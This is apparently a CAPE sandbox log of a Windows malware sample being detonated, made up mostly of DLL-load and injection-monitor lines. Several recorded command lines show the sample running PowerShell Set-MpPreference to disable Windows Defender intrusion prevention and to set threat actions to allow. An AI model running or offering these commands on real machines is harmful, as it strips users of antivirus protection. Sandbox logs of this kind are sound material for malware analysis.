2019-08-13 23:41:18,226 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:18,226 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:18,226 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:18,226 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,226 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:18,226 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:18,240 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:18,240 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1988
2019-08-13 23:41:18,240 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,240 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,240 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:18,240 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,256 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,256 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,256 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:18,256 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3004
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:18,256 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,256 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1356 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000044000-0x0000000000140000
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:18,256 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:18,272 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,272 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true.
2019-08-13 23:41:18,272 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,272 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:18,272 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:18,272 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:18,272 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:18,272 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,272 [root] INFO: Added new process to list with pid: 1356
2019-08-13 23:41:18,272 [root] DEBUG: Loader: Injecting process 1988 (thread 2380) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,272 [root] INFO: Monitor successfully loaded in process with pid 1356.
2019-08-13 23:41:18,288 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:18,288 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,288 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:18,288 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,288 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:18,288 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:18,288 [root] INFO: Announced 64-bit process name: powershell.exe pid: 1964
2019-08-13 23:41:18,288 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:18,288 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:18,288 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,288 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,303 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:18,303 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,303 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:18,303 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:18,303 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:18,319 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,319 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,319 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:18,319 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,319 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3004 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000245000-0x0000000000250000
2019-08-13 23:41:18,319 [root] DEBUG: Loader: Injecting process 1964 (thread 2820) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,319 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:18,319 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1988
2019-08-13 23:41:18,365 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisablePrivacyMode $true.
2019-08-13 23:41:18,365 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,365 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,365 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,365 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:18,365 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,365 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,381 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,381 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,381 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:18,381 [root] INFO: Added new process to list with pid: 3004
2019-08-13 23:41:18,397 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,397 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:18,522 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,615 [root] INFO: Monitor successfully loaded in process with pid 3004.
2019-08-13 23:41:18,709 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,724 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:18,740 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:18,786 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:18,818 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:18,834 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:18,834 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:18,849 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,849 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:18,865 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,865 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1964
2019-08-13 23:41:18,911 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,911 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:18,911 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:18,911 [root] INFO: Process with pid 1092 has terminated
2019-08-13 23:41:18,911 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:18,911 [root] INFO: Process with pid 2244 has terminated
2019-08-13 23:41:18,927 [root] INFO: Process with pid 1788 has terminated
2019-08-13 23:41:18,927 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:18,927 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,927 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:18,943 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,973 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,973 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:18,973 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:18,973 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:19,036 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:19,036 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:19,036 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:19,036 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:19,052 [root] INFO: Announced 64-bit process name: cmd.exe pid: 668
2019-08-13 23:41:19,052 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:19,052 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1988 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000184000-0x0000000000280000
2019-08-13 23:41:19,052 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:19,052 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:19,068 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:19,068 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:19,068 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -SevereThreatDefaultAction 6.
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:19,084 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:19,084 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:19,084 [root] INFO: Added new process to list with pid: 1988
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:19,084 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:19,084 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:19,084 [root] INFO: Monitor successfully loaded in process with pid 1988.
2019-08-13 23:41:19,098 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:19,098 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:19,098 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:19,098 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:19,098 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:19,098 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:19,098 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:19,130 [root] DEBUG: Loader: Injecting process 668 (thread 416) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,145 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:19,145 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:19,145 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:19,161 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1964 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000175000-0x0000000000180000
2019-08-13 23:41:19,161 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:19,177 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:19,161 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:19,177 [root] INFO: Announced 64-bit process name: powershell.exe pid: 920
2019-08-13 23:41:19,177 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:19,177 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:19,177 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableIntrusionPreventionSystem $true.
2019-08-13 23:41:19,177 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,177 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:19,177 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:19,177 [root] INFO: Added new process to list with pid: 1964
2019-08-13 23:41:19,177 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:19,193 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:19,193 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:19,193 [root] INFO: Monitor successfully loaded in process with pid 1964.
2019-08-13 23:41:19,193 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:19,193 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:19,193 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:19,193 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:19,207 [root] DEBUG: Loader: Injecting process 920 (thread 2796) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,207 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:19,207 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,207 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\00R5Q3FLPU2BRO922T83.temp'
2019-08-13 23:41:19,207 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:19,207 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:19,223 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 668
2019-08-13 23:41:19,223 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,223 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:19,223 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\00R5Q3FLPU2BRO922T83.temp'
2019-08-13 23:41:19,223 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:19,223 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:19,240 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:19,240 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:19,240 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:19,240 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:19,240 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:19,240 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\00R5Q3FLPU2BRO922T83.temp'
2019-08-13 23:41:19,240 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:19,255 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:19,255 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:19,255 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:19,255 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:19,255 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP'
2019-08-13 23:41:19,255 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:19,270 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:19,270 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:19,270 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,286 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:19,286 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:19,286 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:19,286 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:19,286 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 920
2019-08-13 23:41:19,302 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp" does not exist, skip.
2019-08-13 23:41:19,302 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:19,302 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:19,302 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:19,302 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:19,318 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:19,364 [root] INFO: Announced 64-bit process name: cmd.exe pid: 3000
2019-08-13 23:41:19,380 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:19,395 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:19,395 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:19,411 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:19,427 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp" does not exist, skip.
2019-08-13 23:41:19,427 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:19,427 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:19,427 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:19,427 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:19,441 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:19,441 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:19,441 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:19,441 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:19,441 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 668 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000064000-0x0000000000160000
2019-08-13 23:41:19,441 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:19,441 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:19,457 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:19,457 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:19,489 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:19,489 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -LowThreatDefaultAction 6.
2019-08-13 23:41:19,489 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:19,489 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:19,505 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:19,505 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:19,519 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:19,519 [root] INFO: Added new process to list with pid: 668
2019-08-13 23:41:19,519 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:19,519 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:19,614 [root] INFO: Monitor successfully loaded in process with pid 668.
2019-08-13 23:41:19,676 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
